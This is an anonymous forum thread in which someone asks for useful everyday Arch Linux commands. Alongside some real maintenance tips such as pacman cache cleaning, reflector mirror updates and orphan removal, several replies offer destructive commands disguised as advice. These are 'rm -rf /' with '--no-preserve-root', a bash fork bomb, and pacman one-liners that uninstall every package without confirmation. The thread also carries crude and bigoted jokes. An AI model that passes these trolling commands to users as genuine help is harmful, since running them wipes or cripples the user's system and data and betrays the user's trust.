give me some useful everyday commands for arch linux

give me some useful everyday commands for arch linux

Ape Out Shirt $21.68

Black Rifle Cuck Company, Conservative Humor Shirt $21.68

Ape Out Shirt $21.68

  1. 4 weeks ago
    Anonymous

    cd

    • 4 weeks ago
      Anonymous

      crossdressing? sounds about right for arch

  2. 4 weeks ago
    Anonymous

    vim

  3. 4 weeks ago
    Anonymous

    neofetch

  4. 4 weeks ago
    Anonymous

    cat /dev/urandom > nutblaster.txt

    • 4 weeks ago
      Anonymous

      the frick?

    • 4 weeks ago
      Anonymous

      heh that was funny

  5. 4 weeks ago
    Anonymous

    https://phoenixnap.com/kb/wp-content/uploads/2023/11/linux-commands-cheat-sheet-pdf.pdf

    • 4 weeks ago
      Anonymous

      i know all of them
      anything else?

      • 4 weeks ago
        Anonymous

        yahweh

        • 4 weeks ago
          Anonymous

          >yahweh: command not found
          ???, what package?

          • 4 weeks ago
            Anonymous

            libjudaism, version 2.7-1 and up

  6. 4 weeks ago
    Anonymous

    rm -rf /

    • 3 weeks ago
      Anonymous

      forgot --no-preserve-root

  7. 4 weeks ago
    Anonymous

    cmatrix

  8. 4 weeks ago
    Anonymous

    ldd
    kpartx
    loginctl

  9. 4 weeks ago
    Anonymous

    pacman -Sc and reflector --latest 5 --protocol https --sort rate --save /etc/pacman.d/mirrorlist once a month

  10. 4 weeks ago
    Anonymous

    neofetch for arch btw posting

    • 4 weeks ago
      Anonymous

      I use arch btw

  11. 4 weeks ago
    Anonymous

    sudo pacman -R -force --noconfirm $(pacman -Q | cut -f 1 -d " ")

    • 4 weeks ago
      Anonymous

      less ugly
      pacman -Qq | sudo pacman -R --noconfirm -

  12. 4 weeks ago
    Anonymous

    nixos-infect

  13. 4 weeks ago
    Anonymous

    fuser

  14. 4 weeks ago
    Anonymous

    >arch linux
    rm penis

  15. 4 weeks ago
    Anonymous

    :(){ :|:& };:

  16. 4 weeks ago
    Anonymous

    kjv
    auimkusb
    quicktile
    torphantom start
    arch-chroot

  17. 4 weeks ago
    Anonymous

    LOAD "*",8,1

  18. 4 weeks ago
    Anonymous

    sudo nixos-install /

  19. 4 weeks ago
    Anonymous

    paccache in pacman-coontrib package for removing old versions of packages in /var/cache

    • 3 weeks ago
      Anonymous

      list orphan packages
      pacman -Qtdq
      remove the orphans
      sudo pacman -Rns $(pacman -Qtdq)

      to create a pastebin of whatever text you just copied
      nc termbin.com 9999 | xclip -sel clip

      replace oldstring by newstring
      xclip -selection c -o | sed "s/oldstring/newstring/g" | xclip -sel clip;
      i use it to type code in here, I highlight the code and code it with CTRL+S then replace 'spoiler' with 'code'

      all these should be alias'd

      came here to post this

      to delete the cache except the 1 last version of packages
      paccacke -rk1 works with 2, 3... Pacman's Arch wiki page has all the info

  20. 4 weeks ago
    Anonymous

    neofetch
    clear

    That's about it.

  21. 4 weeks ago
    Anonymous

    Boot into a livecd and format your arch install

  22. 3 weeks ago
    Anonymous

    grep

  23. 3 weeks ago
    Anonymous

    sed and which

  24. 3 weeks ago
    Anonymous

    fastfetch

Leave a Reply to Anonymous Cancel reply

Your email address will not be published. Required fields are marked *